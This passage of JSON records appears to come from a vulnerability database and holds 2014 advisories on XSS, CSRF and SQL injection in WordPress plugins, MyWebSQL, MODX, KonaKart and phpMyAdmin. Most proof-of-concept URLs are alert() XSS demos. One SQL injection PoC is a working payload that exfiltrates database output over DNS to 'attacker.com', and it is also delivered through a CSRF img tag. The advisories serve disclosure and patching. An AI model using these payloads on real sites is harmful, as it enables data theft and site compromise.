A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&enc=%27%22%29;%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Contact Form DB 2.8.16.\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/contact-form-7-to-database-extension/changelog/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23233 - https://www.htbridge.com/advisory/HTB23233 - Two XSS in Contact Form DB WordPress Plugin.\r\n[2] Contact Form DB WordPress plugin - http://wordpress.org/plugins/contact-form-7-to-database-extension/ - Save form submissions to the database from Contact Form 7, Fast Secure Contact Form, JetPack Contact Form and Gravity Forms. 
Includes exports and short codes.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31165", "title": "Two XSS in Contact Form DB WordPress plugin", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-6315"], "description": "\r\n\r\nAdvisory ID: HTB23232\r\nProduct: Photo Gallery WordPress plugin\r\nVendor: http://web-dorado.com/\r\nVulnerable Version(s): 1.1.30 and probably prior\r\nTested Version: 1.1.30\r\nAdvisory Publication: September 10, 2014 [without technical details]\r\nVendor Notification: September 10, 2014 \r\nVendor Patch: September 10, 2014 \r\nPublic Disclosure: October 1, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-6315\r\nRisk Level: 
Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315\r\n\r\n1.1 Input passed via the "callback" HTTP GET parameter to "/wp-admin/admin-ajax.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.2 Input passed via the "dir" HTTP GET parameter to "/wp-admin/admin-ajax.php" script is not properly sanitised before being returned to the user. 
A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.3 Input passed via the "extensions" HTTP GET parameter to "/wp-admin/admin-ajax.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Photo Gallery 1.1.31\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23232 - https://www.htbridge.com/advisory/HTB23232 - Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin.\r\n[2] Photo Gallery WordPress plugin - http://web-dorado.com/ - This plugin is a fully responsive gallery plugin with advanced functionality. It allows having different image galleries for your posts and pages. 
You can create unlimited number of galleries, combine them into albums, and provide descriptions and tags.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31167", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31167", "title": "Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:183\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : September 24, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated phpmyadmin package fixes security vulnerability:\r\n \r\n In phpMyAdmin before 4.2.9, by deceiving a logged-in user to click on\r\n a crafted URL, it is possible to perform remote code execution and in\r\n some cases, create a root account due to a DOM based XSS vulnerability\r\n in the micro history feature (CVE-2014-6300).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6300\r\n http://advisories.mageia.org/MGASA-2014-0383.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 081d40d2fc64105bc0d4d6dd93b33ea2 mbs1/x86_64/phpmyadmin-4.2.9-1.mbs1.noarch.rpm \r\n 9a937ee1396303d33c4dc05371761e69 mbs1/SRPMS/phpmyadmin-4.2.9-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To 
upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFUIs9VmqjQ0CJFipgRAjl/AJwPlBVdaeOMbA/8P08dKR2WT69MTgCg4NFP\r\nuxJfyBb76CCC2gErawkQAhQ=\r\n=URql\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:183 ] phpmyadmin", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31184", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31184", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-5516"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nCVE-2014-5516\r\n===================\r\n"Cross-Site Request Forgery (CSRF) protection bypass" (CWE-352) vulnerability \r\nin "KonaKart Storefront Application" Enterprise Java eCommerce product\r\n\r\n\r\nVendor\r\n===================\r\nDS Data Systems (UK) Ltd.\r\n\r\n\r\nProduct\r\n===================\r\n"KonaKart is an affordable java based shopping cart software solution for online 
retailers. \r\nLet KonaKart help increase your eCommerce sales."\r\n - source: http://www.konakart.com\r\n\r\n"KonaKart is a Java eCommerce system aimed at medium to large online retailers."\r\n - source: https://en.wikipedia.org/wiki/KonaKart\r\n\r\n\r\nAffected versions\r\n===================\r\nThis vulnerability affects versions of KonaKart Storefront Application prior to 7.3.0.0\r\n\r\n\r\nPatch\r\n===================\r\nThe vendor has released a XSRF fix as part of version 7.3.0.0 at\r\nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new\r\n\r\n\r\nReported by\r\n===================\r\nThis issue was reported to the vendor by Christian Schneider (@cschneider4711) \r\nfollowing a responsible disclosure process.\r\n\r\n\r\nSeverity\r\n===================\r\nMedium\r\n\r\n\r\nDescription\r\n===================\r\nThe existing CSRF protection token was checked for every POST request\r\nproperly. When modifying the request from POST method to GET method \r\nall state-changing actions worked as well, but the CSRF token protection \r\nwas no longer enforced, allowing CSRF attacks.\r\n\r\n\r\nEscalation potential\r\n====================\r\nExploitation demonstration was responsibly provided along with the vulnerability \r\nreport to the vendor, which changed a victim's mail address (using the CSRF \r\nprotection bypass) to an attacker-supplied mail address, allowing a successful \r\nreset of victim's account password by the attacker.\r\n\r\n\r\nTimeline\r\n===================\r\n2014-05-02 Vulnerability discovered\r\n2014-05-02 Vulnerability responsibly reported to vendor\r\n2014-05-02 Reply from vendor acknowledging report\r\n2014-??-?? 
Vendor released patch as part of version 7.3.0.0\r\n2014-09-20 Advisory published via BugTraq\r\n\r\n\r\nReferences\r\n===================\r\nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new\r\nhttp://www.christian-schneider.net/advisories/CVE-2014-5516.txt\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (Darwin)\r\n\r\niEYEARECAAYFAlQd69cACgkQXYAsOfddvFOTVACgr/f5+x5kf60t5LaCqhH0pvSY\r\nQYoAnjiI0WSa3iGuw/OfXk3/vLV+liFm\r\n=61mn\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31211", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31211", "title": "CVE-2014-5516 CSRF protection bypass in "KonaKart" Java eCommerce product", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-4735"], "description": "\r\n\r\nAdvisory ID: HTB23221\r\nProduct: MyWebSQL\r\nVendor: http://mywebsql.net/\r\nVulnerable Version(s): 3.4 and probably prior\r\nTested Version: 3.4\r\nAdvisory Publication: June 25, 2014 [without technical details]\r\nVendor Notification: June 25, 2014 \r\nPublic Disclosure: September 3, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-4735\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in MyWebSQL, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in MyWebSQL: CVE-2014-4735\r\n\r\nThe vulnerability is caused by insufficient sanitization of the 
"table" HTTP GET parameter passed to "/index.php" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of vulnerable website. Further exploitation of this vulnerability may grant an attacker full access to the website's databases and get complete control over it.\r\n\r\nThe following exploitation example uses the alert() JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/?q=wrkfrm&type=exporttbl&table=%27;%3C/script%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nDisclosure timeline:\r\n2014-06-25 Vendor alerted via emails and contact form.\r\n2014-07-03 Vendor alerted via emails, contact form and twitter.\r\n2014-07-03 Vendor replied that he received information.\r\n2014-07-10 Fix requested.\r\n2014-07-10 Vendor requested to move public disclosure date to August 30.\r\n2014-08-27 Fix requested.\r\n2014-08-27 Vendor didn't release any patch and agreed to disclose on August 30 without patch.\r\n2014-08-27 Disclosure date moved to September 3.\r\n2014-09-01 Fix requested.\r\n2014-09-03 Public disclosure, patch by HTB Research is available.\r\n\r\nCurrently we are not aware of any official solution for this vulnerability.\r\nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23221-patch.zip\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23221 - https://www.htbridge.com/advisory/HTB23221 - Cross-Site Scripting (XSS) in MyWebSQL.\r\n[2] MyWebSQL - http://mywebsql.net/ - MyWebSQL is the ultimate desktop replacement for managing your MySQL databases over the web.\r\n[3] Common Vulnerabilities and Exposures (CVE) - 
http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31192", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31192", "title": "Reflected Cross-Site Scripting (XSS) in MyWebSQL", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:194\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : October 3, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability has been discovered and corrected in phpmyadmin:\r\n \r\n With a crafted ENUM value 
it is possible to trigger an XSS in table\r\n search and table structure pages (CVE-2014-7217).\r\n \r\n This upgrade provides the latest phpmyadmin version (4.2.9.1) to\r\n address this vulnerability.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7217\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n ff0e5b44787e03e9d09d9c9200cecd3a mbs1/x86_64/phpmyadmin-4.2.9.1-1.mbs1.noarch.rpm \r\n f9075edf1b5a66acdaccc1bf0574c3f6 mbs1/SRPMS/phpmyadmin-4.2.9.1-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. 
You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFULlltmqjQ0CJFipgRAsD7AJwMmbkAyyQJtGHrUMUqM0kaXaarvgCfck+W\r\nGisKIxQdggHou8U1F8JP2xY=\r\n=t4Ln\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:194 ] phpmyadmin", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31185", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31185", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-6242"], "description": "\r\n\r\nAdvisory ID: HTB23231\r\nProduct: All In One WP Security WordPress plugin\r\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \r\nVulnerable Version(s): 3.8.2 and probably prior\r\nTested Version: 3.8.2\r\nAdvisory Publication: September 3, 2014 [without technical details]\r\nVendor Notification: September 3, 2014 \r\nVendor Patch: September 12, 2014 \r\nPublic Disclosure: September 24, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-6242\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research 
Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \r\n\r\n\r\n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242\r\n\r\n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. 
In order to do so an attacker should trick a logged-in administrator to visit a web page with a CSRF exploit, e.g.:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\n\r\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. 
In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:\r\n\r\n<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to All In One WP Security 3.8.3\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.\r\n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) 
model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31168", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31168", "title": "Two SQL Injections in All In One WP Security WordPress plugin", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-5451"], "description": "\r\n\r\nAdvisory ID: HTB23229\r\nProduct: MODX Revolution\r\nVendor: MODX\r\nVulnerable Version(s): 2.3.1-pl and probably prior\r\nTested Version: 2.3.1-pl\r\nAdvisory Publication: August 20, 2014 [without technical details]\r\nVendor Notification: August 20, 2014 \r\nVendor Patch: September 11, 2014 \r\nPublic Disclosure: September 17, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-5451\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in MODX Revolution: CVE-2014-5451\r\n\r\nThe vulnerability exists due to insufficient 
sanitization of input data passed via the "a" HTTP GET parameter to "/manager/" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\nThis vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/manager/?a=%22%20onload=%22javascript:alert%28/immuniweb/%29;%22%3E\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate "manager/templates/default/header.tpl" file from GitHub.\r\n\r\nMore Information:\r\nhttps://github.com/modxcms/revolution/issues/11966\r\nhttps://github.com/modxcms/revolution/commit/e36f80f18e9514204bf2ce82747c8adf7e47a9c9\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23229 - https://www.htbridge.com/advisory/HTB23229 - Reflected Cross-Site Scripting (XSS) in MODX Revolution.\r\n[2] MODX Revolution - http://modx.com - MODX Revolution is the web content management platform for those that truly care about no-compromise design and exceptional user experience. 
It gives you complete control over your site and content, with the flexibility and scalability to adapt to your changing needs.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
